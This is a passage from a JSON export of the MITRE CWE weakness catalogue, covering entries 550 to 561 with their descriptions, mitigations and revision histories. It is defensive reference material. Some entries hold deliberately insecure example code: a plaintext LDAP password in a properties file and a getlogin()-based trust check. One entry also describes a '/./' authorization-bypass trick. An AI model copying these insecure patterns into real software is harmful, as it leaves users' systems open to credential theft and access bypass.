Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Type"}]}},"550":{"attr":{"@_ID":"550","@_Name":"Server-generated Error Message Containing Sensitive Information","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Certain conditions, such as network failure, will cause a server error message to be displayed.","Extended_Description":"While error messages in and of themselves are not dangerous, per se, it is what an attacker can glean from them that might cause eventual problems.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"209","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Confidentiality","Impact":"Read Application Data"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Architecture and Design","System Configuration"],"Description":"Recommendations include designing and adding consistent error handling mechanisms which are capable of handling any user input to your web application, providing meaningful detail to end-users, and preventing error messages that might provide information useful to an attacker from being displayed."}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Name, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Name, Relationships"}],"Previous_Entry_Name":[{"#text":"Information Leak Through Server Error Message","attr":{"@_Date":"2011-03-29"}},{"#text":"Information Exposure Through Server Error Message","attr":{"@_Date":"2020-02-24"}}]}},"551":{"attr":{"@_ID":"551","@_Name":"Incorrect Behavior Order: Authorization Before Parsing and Canonicalization","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"If a web server does not fully parse requested URLs before it examines them for authorization, it may be possible for an attacker to bypass authorization protection.","Extended_Description":"For instance, the character strings /./ and / both mean current directory. If /SomeDirectory is a protected directory and an attacker requests /./SomeDirectory, the attacker may be able to gain access to the resource if /./ is not converted to / before the authorization check is performed.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"863","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"696","@_View_ID":"1000"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"URL Inputs should be decoded and canonicalized to the application\'s current internal representation before being validated and processed for authorization. Make sure that your application does not decode the same input twice. Such errors could be used to bypass allowlist schemes by introducing dangerous inputs after they have been checked."}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Authentication Before Parsing and Canonicalization","attr":{"@_Date":"2008-04-11"}}}},"552":{"attr":{"@_ID":"552","@_Name":"Files or Directories Accessible to External Parties","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product makes files or directories accessible to unauthorized actors, even though they should not be.","Extended_Description":"Web servers, FTP servers, and similar servers may store a set of files underneath a \\"root\\" directory that is accessible to the server\'s users.  Applications may store sensitive files underneath this root without also using access control to limit which users may request those files, if any.  Alternately, an application might package multiple files or directories into an archive file (e.g., ZIP or tar), but the application might not exclude sensitive files that are underneath those directories.","Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"668","@_View_ID":"1003","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"285","@_View_ID":"1000"}}]},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."},{"Phase":"Operation","Note":"OMISSION: This weakness is caused by missing a security tactic during the architecture and design phase."}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity"],"Impact":["Read Files or Directories","Modify Files or Directories"]}},"Affected_Resources":{"Affected_Resource":"File or Directory"},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A10","Entry_Name":"Insecure Configuration Management","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"CERT C Secure Coding"},"Entry_ID":"FIO15-C","Entry_Name":"Ensure that file operations are performed in a secure directory"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"150"}},{"attr":{"@_CAPEC_ID":"639"}}]},"Content_History":{"Submission":{"Submission_Name":"CWE Community","Submission_Date":"2006-07-19","Submission_Comment":"Submitted by members of the CWE community to extend early CWE versions"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Organization":"Veracode","Modification_Date":"2010-09-09","Modification_Comment":"Suggested OWASP Top Ten mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Affected_Resources, Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Description, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns"}],"Previous_Entry_Name":{"#text":"Errant Files or Directories Accessible","attr":{"@_Date":"2008-04-11"}}}},"553":{"attr":{"@_ID":"553","@_Name":"Command Shell in Externally Accessible Directory","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"A possible shell file exists in /cgi-bin/ or other accessible directories. This is extremely dangerous and can be used by an attacker to execute commands on the web server.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"552","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Availability"],"Impact":"Execute Unauthorized Code or Commands"}},"Potential_Mitigations":{"Mitigation":{"Phase":["Installation","System Configuration"],"Description":"Remove any Shells accessible under the web root folder and children directories."}},"Related_Attack_Patterns":{"Related_Attack_Pattern":{"attr":{"@_CAPEC_ID":"650"}}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Possible Command Shell (csh)","attr":{"@_Date":"2008-04-11"}}}},"554":{"attr":{"@_ID":"554","@_Name":"ASP.NET Misconfiguration: Not Using Input Validation Framework","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The ASP.NET application does not use an input validation framework.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1173","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"ASP.NET","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Integrity","Impact":"Unexpected State","Note":"Unchecked input leads to cross-site scripting, process control, and SQL injection vulnerabilities, among others."}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":{"xhtml:p":"Use the ASP.NET validation framework to check all program input before it is processed by the application. Example uses of the validation framework include checking to ensure that:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:ol":{"xhtml:li":["Phone number fields contain only valid characters in phone numbers","Boolean values are only \\"T\\" or \\"F\\"","Free-form strings are of a reasonable length and composition"]}}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Other_Notes, Taxonomy_Mappings, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Common_Consequences, Description, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-27","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"ASP.NET Misconfiguration: Input Validation","attr":{"@_Date":"2008-04-11"}}}},"555":{"attr":{"@_ID":"555","@_Name":"J2EE Misconfiguration: Plaintext Password in Configuration File","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The J2EE application stores a plaintext password in a configuration file.","Extended_Description":"Storing a plaintext password in a configuration file allows anyone who can read the file to access the password-protected resource, making it an easy target for attackers.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"260","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Bypass Protection Mechanism"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Do not hardwire passwords into your software."},{"Phase":"Architecture and Design","Description":"Use industry standard libraries to encrypt passwords before storage in configuration files."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"Below is a snippet from a Java properties file in which the LDAP server password is stored in plaintext.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"webapp.ldap.username=secretUsernamewebapp.ldap.password=secretPassword","xhtml:br":""}}}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Sean Eidemiller","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"added/updated demonstrative examples"},{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Description, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-03-29","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"J2EE Misconfiguration: Password in Configuration File","attr":{"@_Date":"2008-04-11"}}}},"556":{"attr":{"@_ID":"556","@_Name":"ASP.NET Misconfiguration: Use of Identity Impersonation","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"Configuring an ASP.NET application to run with impersonated credentials may give the application unnecessary privileges.","Extended_Description":"The use of impersonated credentials allows an ASP.NET application to run with either the privileges of the client on whose behalf it is executing or with arbitrary privileges granted in its configuration.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"266","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Implementation"},{"Phase":"Operation"}]},"Common_Consequences":{"Consequence":{"Scope":"Access Control","Impact":"Gain Privileges or Assume Identity"}},"Potential_Mitigations":{"Mitigation":{"Phase":"Architecture and Design","Description":"Use the least privilege principle."}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations, Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"ASP.NET Misconfiguration: Identity Impersonation","attr":{"@_Date":"2008-04-11"}}}},"558":{"attr":{"@_ID":"558","@_Name":"Use of getlogin() in Multithreaded Application","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The application uses the getlogin() function in a multithreaded context, potentially causing it to return incorrect values.","Extended_Description":"The getlogin() function returns a pointer to a string that contains the name of the user associated with the calling process. The function is not reentrant, meaning that if it is called from another process, the contents are not locked out and the value of the string can be changed by another process. This makes it very risky to use because the username can be changed by other processes, so the results of the function cannot be trusted.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"663","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":[{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}},{"attr":{"@_Name":"C++","@_Prevalence":"Undetermined"}}]},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Access Control","Other"],"Impact":["Modify Application Data","Bypass Protection Mechanism","Other"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"Using names for security purposes is not advised. Names are easy to forge and can have overlapping user IDs, potentially causing confusion or impersonation."},{"Phase":"Implementation","Description":"Use getlogin_r() instead, which is reentrant, meaning that other processes are locked out from changing the username."}]},"Demonstrative_Examples":{"Demonstrative_Example":{"Intro_Text":"The following code relies on getlogin() to determine whether or not a user is trusted. It is easily subverted.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"pwd = getpwnam(getlogin());if (isTrustedGroup(pwd-&gt;pw_gid)) {} else {}","xhtml:br":"","xhtml:div":[{"#text":"allow();","attr":{"@_style":"margin-left:10px;"}},{"#text":"deny();","attr":{"@_style":"margin-left:10px;"}}]}}}},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Often Misused: Authentication"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP3","Entry_Name":"Use of an improper API"}]},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Description, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":{"#text":"Misused Authentication: getlogin()","attr":{"@_Date":"2008-04-11"}}}},"560":{"attr":{"@_ID":"560","@_Name":"Use of umask() with chmod-style Argument","@_Abstraction":"Variant","@_Structure":"Simple","@_Status":"Draft"},"Description":"The product calls umask() with an incorrect argument that is specified as if it is an argument to chmod().","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"687","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Name":"C","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":{"Scope":["Confidentiality","Integrity","Access Control"],"Impact":["Read Files or Directories","Modify Files or Directories","Bypass Protection Mechanism"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Implementation","Description":"Use umask() with the correct argument."},{"Phase":"Testing","Description":"If you suspect misuse of umask(), you can use grep to spot call instances of umask()."}]},"Notes":{"Note":{"#text":"Some umask() manual pages begin with the false statement: \\"umask sets the umask to mask &amp; 0777\\" Although this behavior would better align with the usage of chmod(), where the user provided argument specifies the bits to enable on the specified file, the behavior of umask() is in fact opposite: umask() sets the umask to ~mask &amp; 0777. The documentation goes on to describe the correct usage of umask(): \\"The umask is used by open() to set initial file permissions on a newly-created file. Specifically, permissions in the umask are turned off from the mode argument to open(2) (so, for example, the common umask default value of 022 results in new files being created with permissions 0666 &amp; ~022 = 0644 = rw-r--r-- in the usual case where the mode is specified as 0666).\\"","attr":{"@_Type":"Other"}}},"Content_History":{"Submission":{"Submission_Name":"Anonymous Tool Vendor (under NDA)","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-07-20","Modification_Comment":"updated Other_Notes"}],"Previous_Entry_Name":{"#text":"Often Misused: umask()","attr":{"@_Date":"2008-04-11"}}}},"561":{"attr":{"@_ID":"561","@_Name":"Dead Code","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software contains dead code, which can never be executed.","Extended_Description":"Dead code is source code that can never be executed in a running program. The surrounding code makes it impossible for a section of code to ever be executed.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"1164","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Indirect"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":{"Phase":"Implementation"}},"Common_Consequences":{"Consequence":[{"Scope":"Other","Impact":"Quality Degradation","Note":"Dead code that results from code that can never be executed is an indication of problems with the source code that needs to be fixed and is an indication of poor quality."},{"Scope":"Other","Impact":"Reduce Maintainability"}]},"Detection_Methods":{"Detection_Method":[{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost 